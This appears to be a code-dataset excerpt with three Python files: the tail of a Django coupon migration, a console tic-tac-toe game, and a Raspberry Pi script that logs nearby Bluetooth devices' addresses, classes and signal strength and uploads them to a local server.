('valid_from_date', models.DateTimeField(verbose_name='生效日期与时间')),
('valid_to_date', models.DateTimeField(verbose_name='失效日期与时间')),
('valid_flag', models.BooleanField(verbose_name='是否有效超级开关')),
('issued_count', models.IntegerField(default=0, verbose_name='已发放数量')),
('redeemed_count', models.IntegerField(default=0, verbose_name='已使用数量')),
('coupon_type', models.CharField(choices=[('DISCOUNT', '折扣'), ('CASH', '直减')], max_length=15, verbose_name='优惠减免类型')),
('cash_value', models.IntegerField(blank=True, null=True, verbose_name='直减金额')),
('discount_value', models.DecimalField(blank=True, decimal_places=2, max_digits=2, null=True, verbose_name='折扣比例(小数)')),
('create_date_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('last_modify_date_time', models.DateTimeField(auto_now=True, verbose_name='上次修改时间')),
('related_trip', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to='trips.Trip', verbose_name='关联活动')),
('related_user', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='关联用户')),
],
options={
'verbose_name': '优惠券',
'verbose_name_plural': '优惠券s',
},
),
migrations.AddField(
model_name='coupon',
name='coupon_template_reference',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='promotions.CouponTemplate', verbose_name='关联优惠券模板对象'),
),
migrations.AddField(
model_name='coupon',
name='order_reference',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='orders.Order', verbose_name='关联优惠码对象'),
),
migrations.AddField(
model_name='coupon',
name='user_reference',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='关联用户对象'),
),
]
| UTF-8 | Python | false | false | 3,927 | py | 101 | 0005_auto_20180904_1920.py | 55 | 0.606276 | 0.585812 | 0 | 66 | 54.530303 | 185 |
AyakaKusakari/tic-tac-toe | 10,222,022,173,498 | ee5df82e7ec4e038fdee28aa31eafaef9cd54060 | edd5795d2aad0da51d0a34de4aefc6a3ccf0d9b9 | /tictactoe.py | 4bed38fb2d8eb4cb5e6df66ec61a35e14df42f81 | []
| no_license | https://github.com/AyakaKusakari/tic-tac-toe | e1b902217d45800822a6e22babda8764298c3097 | e22ef4f7fcf5bce4897eb81ec954cd0d079a9b27 | refs/heads/master | 2021-05-17T04:34:53.201550 | 2020-03-30T20:25:02 | 2020-03-30T20:25:02 | 250,626,397 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
1.最初のプレイヤーが記号を書き込む
2.その時点で記号が3つ並んでいるかを確認
3.次のプレイヤーが記号を書き込む
3以降は2〜3をくり返す
"""
start = """
_/_/_/_/_/_/_/_/_/_/_/_/_/
Tic Tac Toe
_/_/_/_/_/_/_/_/_/_/_/_/_/
【遊び方】
1~9で座標を選んでください。
※0を入力すると、ゲームが終了します。
"""
table = """
1|2|3
-----
4|5|6
-----
7|8|9
"""
win = """
"""
print(start)
print(table)
# 1~9までのリスト
candidates = [i for i in range(1, 10)]
# 先行
first_list = []
# 後攻
second_list = []
# カウント用
n = 1
# coordinate = 今まで書き込んだ座標リスト
# coordinateの中身のリストをset関数でソートさせ、もう1つのsetとの共通部分をリスト化させ、比較する
def judgment(coordinate):
# 横のパターン
if [1, 2, 3] == list(set([1, 2, 3]) & set(coordinate)): return True
elif [4, 5, 6] == list(set([4, 5, 6]) & set(coordinate)): return True
elif [7, 8, 9] == list(set([7, 8, 9]) & set(coordinate)): return True
# 縦のパターン
elif [1, 4, 7] == list(set([1, 4, 7]) & set(coordinate)): return True
elif [2, 5, 8] == list(set([2, 5, 8]) & set(coordinate)): return True
elif [3, 6, 9] == list(set([3, 6, 9]) & set(coordinate)): return True
# 斜めのパターン
elif [1, 5, 9] == list(set([1, 5, 9]) & set(coordinate)): return True
elif [3, 5, 7] == list(set([3, 5, 7]) & set(coordinate)): return True
else: return False
while True:
# 奇数回の時
if n % 2 == 1:
print(f" ---{n}手目---\n")
first = input("○の座標を入力してください:")
# 整数に変換
first = int(first)
if first in candidates:
# 入力した数字を○に置換
table = table.replace(str(first), "o")
# 元の座標リストから、入力した数字を削除
candidates.remove(first)
# リストに入力した座標を追加
first_list.append(first)
print(table)
n += 1
if judgment(first_list):
print(" ---------------\n| ○の勝ち!! |\n ---------------")
break
elif first == 0:
print("\n -------------------------\n| ゲームを終了します。 |\n -------------------------")
break
else:
print("\n※正しい座標を入力してください\n")
continue
# 9回で勝敗がつかなかったらあいこ
elif n == 10:
print(" -------------------\n| あいこでした。 |\n -------------------")
break
# 偶数回の時
else:
print(f" ---{n}手目---\n")
second = input("×の座標を入力してください:")
# 整数に変換
second = int(second)
if second in candidates:
# 入力した数字を×に置換
table = table.replace(str(second), "x")
# 元の座標リストから、入力した数字を削除
candidates.remove(second)
# リストに入力した座標を追加
second_list.append(second)
print(table)
n += 1
if judgment(second_list):
print(" ---------------\n| ×の勝ち!! |\n ---------------")
break
elif second == 0:
print("\n -------------------------\n| ゲームを終了します。 |\n -------------------------")
break
else:
print("\n※正しい座標を入力してください\n")
continue
| UTF-8 | Python | false | false | 3,842 | py | 2 | tictactoe.py | 1 | 0.431856 | 0.404598 | 0 | 114 | 24.710526 | 97 |
azhaganavr/Bluetooth_scan_store_send_receive | 14,216,341,794,909 | 8a1b8cc354c87786ea5a1f1dd13d2d42cc80317a | 1869d0ac4441b93faec2077e971ea9283fa3c43f | /bt_terminal_v1.py | f4697b7f66b674009dce498201f31782e8af3d5f | []
| no_license | https://github.com/azhaganavr/Bluetooth_scan_store_send_receive | 89906bbe665fcd5cc4acf116869b4e071bc04bc3 | b5af07ea1dd58d0977dc56756f01a09a80301288 | refs/heads/master | 2020-09-20T17:41:35.158438 | 2019-12-15T15:57:37 | 2019-12-15T15:57:37 | 224,550,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import socket
import subprocess
import os
import time
import csv
import itertools
import datetime
# Importing all necessary libraries
time.sleep(10) # To give a waiting period for the 3G modem to connect
scan_var = 0
j = 0
row_count = 0
RSSI = 00 # Not used just for testing purpose
port = 21
bt_var = 0
scan_data_len = 0
scan_data_array = []
# Necessary variables are initialized
device_name = 'raspi_A' # Each device is given a unique name to identify itself
hci_dump = subprocess.Popen(["hcidump -a hci"], bufsize=0, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT) # Scanning data is taken from the hcidump
while True:
filename = 'bt_send_' + str(time.strftime('%d-%m-%Y')) + '.csv' # This command is used instead.
print("Scanning for Bluetooth data.....")
loop_time = time.time() + 60 # Scanning variable is intialized to current time value plus 300 Seconds
try:
while time.time() < loop_time: # A loop is started for scanning the data for the given duration
flag = 0
for i in range(0, 30, 1):
inchar = hci_dump.stdout.readline() # We store the dump value in inchar
char = str(inchar) # Convert it to string
a, b, c = char.partition(
'bdaddr') # We store the 'baddr', the string before and after 'badddr' string in b,a,c
if (
c): # c is the string that contains the MAC address , Mode variable followed by mode value, class variable followed by classs value, clock offset variable followed by clock offset and rssi variable followed by rssi value in an array
classification = []
device_class = []
device_class += c.split()[6] # the 6th element of array C consists of bluetooth class value
case_array = {'0': 'Uncategorized', '1': 'Computer', '2': 'Phone', '3': 'LAN',
'4': 'Audio/Video', '5': 'Peripheral', '6': 'Imaging', '7': 'Wearable', '8': 'Toys'}
device_type = case_array.get(device_class[5],
'default') # the 5th charecter decides the type of device
concat = str(device_class[6]) + str(
device_class[7]) # the 6th and 7th charecter gives a more detailed classification.
if device_class[5] == '0':
misc_array = {'00': 'Bluetooth Device'}
classification = misc_array.get(concat, 'default')
elif device_class[5] == '1':
computer_array = {'00': 'unasssigned', '04': 'Desktop Workstation', '08': 'Server class',
'0c': 'Laptop', '10': 'Handheld PCA', '14': 'Palm Sized PDA',
'18': 'Wearable'}
classification = computer_array.get(concat, 'default')
elif device_class[5] == '2':
phone_array = {'00': 'unasssigned', '04': 'Cellular', '08': 'Cordless', '0c': 'Smart',
'10': 'Wired Modem or Access Gateway', '14': 'Common ISDN Access'}
classification = phone_array.get(concat, 'default')
elif device_class[5] == '4':
audio_video_array = {'00': 'unasssigned', '04': 'Wearable Headset', '08': 'Hands-Free',
'10': 'Microphone', '14': 'Loudspeaker', '18': 'Headphones',
'1c': 'Portable ', '20': 'Car Audio', '24': 'Set-Top Box', '28': 'HiFi',
'2c': 'Laptop', '30': 'Video Tape Recorder', '34': 'Video Camera',
'38': 'Camcorder', '3c': 'Video Display and Loudspeaker',
'40': 'Video Conferencing', '44': 'Reserved', '48': 'Game/Toy'}
classification = audio_video_array.get(concat, 'default')
elif device_class[5] == '5':
peripheral_array = {'00': 'unasssigned', '04': 'Joystick', '08': 'Gamepad',
'0c': 'Remote control', '10': 'Sensing device', '14': 'Digitiser Tablet',
'18': 'Card Reader'}
classification = peripheral_array.get(concat, 'default')
elif device_class[5] == '6':
imaging_array = {'00': 'unasssigned', '10': 'Display', '20': 'Camera', '40': 'Scanner',
'80': 'Printer'}
classification = imaging_array.get(concat, 'default')
elif device_class[5] == '7':
wearable_array = {'00': 'unasssigned', '04': 'Wrist Watch', '08': 'Pager', '0c': 'Jacket',
'10': 'Helmet', '14': 'Glasses'}
classification = wearable_array.get(concat, 'default')
elif device_class[5] == '8':
toys_array = {'00': 'unasssigned', '04': 'Robot', '08': 'Vehicle', '0c': 'Character',
'10': 'Controller', '14': 'Game'}
classification = toys_array.get(concat, 'default')
device = (str(classification) + ' ' + str(
device_type)) # concatenate the final accurate classification
rssi = []
rssi += c.split()[8] # C array has rssi value in the 8th cell
concat_rssi = (str(rssi[0]) + str(rssi[1]) + str(
rssi[2])) # the three charecters constitute the rssi value
print(device_name + ',' + str(time.strftime('%d-%m-%Y %H:%M:%S')) + ',' + (
c.split()[0]) + ',' + device + ',' + concat_rssi)
data_string = device_name + ',' + str(time.strftime('%d-%m-%Y %H:%M:%S')) + ',' + (
c.split()[0]) + ',' + device + ',' + concat_rssi
scan_data_array.append(data_string)
# print(scan_data_array[scan_var])
scan_var = scan_var + 1 # Just a flag variable used to know whether ther was any scanned value
classification = ""
# print(len(scan_data_array)) #Actual length of the array
data_array = list(set(scan_data_array)) # we remove the duplicate data from the array
scan_data_len = len(data_array)
# print(scan_data_len) # reduced Lenth of the array
if (scan_data_len):
csv_file_obj = open(filename, 'a') # Create an object for open csv file
print("opening csv file to write data")
for i in range(scan_data_len):
bt_var = 1
csv_file_obj.write(data_array[i] + "\n") # writing the values to the CSV file one after the other,
j = 1 # flag to know if any data is written to the file
csv_file_obj.flush()
csv_file_obj.close() # Closing the file
if j:
print('Data Written to the file')
j = 0
scan_data_array = []
scan_var = 0
except Exception as e: # Incase of any error , it is stored in the syslog file
filename_log = 'Syslog.csv'
field_log = ['Error', 'Date & Time']
csv_syslog_obj = open(filename_log, 'a')
print("opening csv file to write exception 1")
log_writer = csv.DictWriter(csv_syslog_obj, fieldnames=field_log)
log_writer.writerow(
{'Error': str(e), 'Date & Time': str(time.strftime('%d-%m-%Y %H:%M:%S'))})
csv_syslog_obj.close()
print("Error: " + str(e))
try:
server_connectivity = 0 # A flag variable used to know whether the device has been connected to the server or not
if (bt_var == 1): # As mentioned above the following block is executed only if any values were scanned and until the values are sent
try: # Checking for internet connectivity
host = socket.gethostbyname("www.google.com")
s = socket.create_connection((host, 80), 2)
s.close()
print('internet on.')
connectivity = 1
except:
print("internet off.")
connectivity = 0
os.system("sudo /etc/init.d/reconnectnet start")
if (connectivity == 1): # only if internet connectivity exists the following connection establishment and data transmission block is executed
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating a socket object
print('Trying to connect.....')
s.connect(("192.168.0.9", port)) # For RapsberryPi to connect to server
# s.connect(("10.21.56.201", port)) # For Institute PC to connect to server
server_connectivity = 1 # flag used to define if connectivity has been established
print(s.recv(1024).decode()) # Connection establishment acknowledgement is printed from the server
from itertools import islice # importing islice from itertools
with open(filename, "r") as f:
send_data = csv.reader(f, delimiter=",")
list_data = list(send_data)
row_count = len(list_data)
print(row_count)
with open(filename, "r") as myfile:
redc_data = list(islice(myfile, row_count)) # it takes the no. of rows and stores in the array
# myfile.close()
if (row_count % 2 == 0): # If the no. of data is even
for even in range(0, row_count - 1, 2):
data = redc_data[0 + even] + redc_data[1 + even]
s.send(data.encode())
else: # if no. of data is odd
s.send(redc_data[0].encode()) # we first send one value seperately
for odd in range(1, row_count - 1, 2): # then we send two values together
data = redc_data[0 + odd] + redc_data[1 + odd]
s.send(data.encode())
endofdata = "END\n" # End of data transmission variable
s.send(endofdata.encode()) # eod variable is transmitted
time.sleep(1)
ack = s.recv(2048).decode() # Once all data is sent the an acknowledgement is received
if ack: # Only if acknowledgement is received we remove the csv file and change the bt_var flag variable
# print(''.join(redc_data))
print('Data Sent Succssfully')
os.remove(filename)
bt_var = 0
data = ""
s.close() # Close the socket
except Exception as g: # any error in the block above is stored in syslog
filename_log = 'Syslog.csv'
field_log = ['Error', 'Date & Time']
csv_syslog_obj = open(filename_log, 'a')
print("opening csv file to write exception 2")
log_writer = csv.DictWriter(csv_syslog_obj, fieldnames=field_log)
log_writer.writerow(
{'Error': str(g), 'Date & Time': str(time.strftime('%d-%m-%Y %H:%M:%S'))})
csv_syslog_obj.close()
print("Error: " + str(g))
if (server_connectivity == 1): # only if connectivity was established we close the socket
s.close() | UTF-8 | Python | false | false | 11,821 | py | 5 | bt_terminal_v1.py | 5 | 0.508586 | 0.489637 | 0 | 236 | 49.09322 | 251 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.